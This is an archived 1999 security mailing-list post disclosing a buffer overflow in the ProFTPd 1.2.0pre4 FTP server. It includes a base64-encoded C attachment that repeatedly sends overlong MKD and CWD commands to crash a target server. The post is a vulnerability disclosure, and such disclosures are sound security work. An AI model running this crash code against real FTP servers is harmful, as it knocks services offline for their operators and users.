This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. ---1463810815-1223308169-936489982=:15281 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: <Pine.LNX.4.10.9909050208003.15329at_private> ---------- Forwarded message ---------- Date: Sun, 05 Sep 1999 02:08:29 +0200 (CEST) From: Renaud Deraison <deraisonat_private> To: linux-securityat_private Subject: [linux-security] buffer overflow in proftpd-1.2.0pre4, supposed to be 'safe' Resent-Date: Sun, 05 Sep 1999 06:16:54 +0000 Resent-From: linux-securityat_private Resent-cc: recipient list not shown: ; Hello, ProFTPd, a FTP server, has been suffering several security holes lately. However, the version 1.2.0pre4 is still vulnerable to a mkdir attack, even though it is supposed to be patched against it. The trick is to create directories whose name don't exceed 255 chars. I have not looked at this problem in detail, but I could at least make a pointer point on a bogus location (85858585) using this method. Attached to this mail is a C program that will make proftpd crash, but which won't exploit the vulnerability. Thank you for your attention, -- Renaud -- Renaud Deraison The Nessus Project http://www.nessus.org ---1463810815-1223308169-936489982=:15281 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="crash_ftpd.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.10.9909050206220.15281at_private> Content-Description: demo code Content-Disposition: ATTACHMENT; FILENAME="crash_ftpd.c" I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5j bHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0K I2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCi8qDQogKiBDcmFzaGVzIFByb0ZU UGQgMS4yLjBwcmU0IGJlY2F1c2Ugb2YgYSBidWZmZXIgb3ZlcmZsb3cuDQog Kg0KICoNCiAqIFRoaXMgYnVnIHdhcyBkaXNjb3ZlcmVkIGJ5IHRoZSBOZXNz dXMgU2VjdXJpdHkgU2Nhbm5lcg0KICoNCiAqIEkgZG9uJ3Qga25vdyBpZiB0 aGlzIGZsYXcgY2FuIGJlIGV4cGxvaXRlZCB0byBnYWluDQogKiByb290IHBy aXZpbGVnZXMuDQogKg0KICoNCiAqIFRoZSBuYW1lIG9mIHRoZSBjcmVhdGVk IGRpcmVjdG9yeSBtdXN0IG5vdCBleGNlZWQgMjU1IGNoYXJzICENCiAqDQog Kg0KICogV3JpdHRlbiBieSBSZW5hdWQgRGVyYWlzb24gPGRlcmFpc29uQGN2 cy5uZXNzdXMub3JnPg0KICoNCiAqLw0KDQovKg0KICogQ2hhbmdlIHRoaXMg IQ0KICovDQojZGVmaW5lIFRBUkdFVCAiMTkyLjE2OC4xLjUiDQojZGVmaW5l IFdSSVRFQUJMRV9ESVIgIi9pbmNvbWluZyINCg0KaW50IG1haW4oKQ0Kew0K IHN0cnVjdCBpbl9hZGRyIHRhcmdldDsNCiBpbnQgc29jOw0KIHN0cnVjdCBz b2NrYWRkcl9pbiBzYTsNCiANCiBjaGFyICogd3JpdGVhYmxlX2RpciA9ICJD V0QgIldSSVRFQUJMRV9ESVIiXHJcbiI7DQogY2hhciAqIG1rZDsNCiBjaGFy ICogY3dkOw0KDQoNCiBpbmV0X2F0b24oVEFSR0VULCAmdGFyZ2V0KTsNCiBt a2QgPSBtYWxsb2MoMzAwKTsJYnplcm8obWtkLCAzMDApOw0KIGN3ZCA9IG1h bGxvYygzMDApOwliemVybyhjd2QsIDMwMCk7DQogDQogc29jID0gc29ja2V0 KFBGX0lORVQsIFNPQ0tfU1RSRUFNLDApOw0KIA0KIGJ6ZXJvKCZzYSwgc2l6 ZW9mKHNhKSk7DQogc2Euc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2Euc2lu X3BvcnQgICA9IGh0b25zKDIxKTsNCiBzYS5zaW5fYWRkci5zX2FkZHIgPSB0 YXJnZXQuc19hZGRyOw0KIGlmKCEoY29ubmVjdChzb2MsIChzdHJ1Y3Qgc29j a2FkZHIgKikmc2EsIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHJfaW4pKSkpDQog ew0KICBjaGFyICogYnVmID0gbWFsbG9jKDEwMjQpOw0KICBpbnQgaTsNCiAg c3ByaW50Zihta2QsICJNS0QgIik7DQogIG1lbXNldChta2QrNCwgJ1gnLCAy NTQpOw0KICBzcHJpbnRmKG1rZCwgIiVzXHJcbiIsIG1rZCk7DQogIA0KICBz cHJpbnRmKGN3ZCwgIkNXRCAiKTsNCiAgbWVtc2V0KGN3ZCs0LCAnWCcsIDI1 NCk7DQogIHNwcmludGYoY3dkLCAiJXNcclxuIiwgY3dkKTsNCiAgDQogIHJl Y3Yoc29jLCBidWYsIDEwMjQsIDApOw0KICBzZW5kKHNvYywgIlVTRVIgZnRw XHJcbiIsIHN0cmxlbigiVVNFUiBmdHBcclxuIiksMCk7DQogIHJlY3Yoc29j LCBidWYsIDEwMjQsIDApOw0KICBiemVybyhidWYsMTAyNCk7DQogIHNlbmQo c29jLCAiUEFTUyBwYXNzQFxyXG4iLCBzdHJsZW4oIlBBU1MgcGFzc0Bcclxu IiksMCk7DQogIHJlY3Yoc29jLCBidWYsIDEwMjQsIDApOw0KICBiemVybyhi dWYsMTAyNCk7DQogIHNlbmQoc29jLCB3cml0ZWFibGVfZGlyLCBzdHJsZW4o d3JpdGVhYmxlX2RpciksIDApOw0KICByZWN2KHNvYywgYnVmLCAxMDI0LCAw KTsNCiAgYnplcm8oYnVmLDEwMjQpOw0KICANCiAgDQogIGZvcihpPTA7aTw0 MDtpKyspDQogIHsNCiAgIHNlbmQoc29jLCBta2QsIHN0cmxlbihta2QpLCAw KTsNCiAgIHJlY3Yoc29jLCBidWYsIDEwMjQsMCk7DQogICBpZighc3RybGVu KGJ1ZikpDQogICB7DQogICAgcHJpbnRmKCJSZW1vdGUgRlRQZCBjcmFzaGVk IChzZWUgL3Zhci9sb2cvbWVzc2FnZXMpXG4iKTsNCiAgICBleGl0KDApOw0K ICAgfQ0KICAgYnplcm8oYnVmLCAxMDI0KTsNCiAgIHNlbmQoc29jLCBjd2Qs IHN0cmxlbihjd2QpLCAwKTsNCiAgIHJlY3Yoc29jLCBidWYsIDEwMjQsMCk7 DQogICBpZighc3RybGVuKGJ1ZikpDQogICB7DQogICAgcHJpbnRmKCJSZW1v dGUgRlRQZCBjcmFzaGVkIChzZWUgL3Zhci9sb2cvbWVzc2FnZXMpXG4iKTsN CiAgICBleGl0KDApOw0KICAgfQ0KICAgYnplcm8oYnVmLCAxMDI0KTsNCiAg fQ0KICBwcmludGYoIllvdSB3ZXJlIG5vdCB2dWxuZXJhYmxlIGFmdGVyIGFs bC4gU29ycnlcbiIpOw0KICBjbG9zZShzb2MpOw0KIH0NCiBlbHNlIHBlcnJv cigiY29ubmVjdCAiKTsNCiByZXR1cm4oMCk7DQp9DQogICANCiAgDQo= ---1463810815-1223308169-936489982=:15281--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:02:02 PDT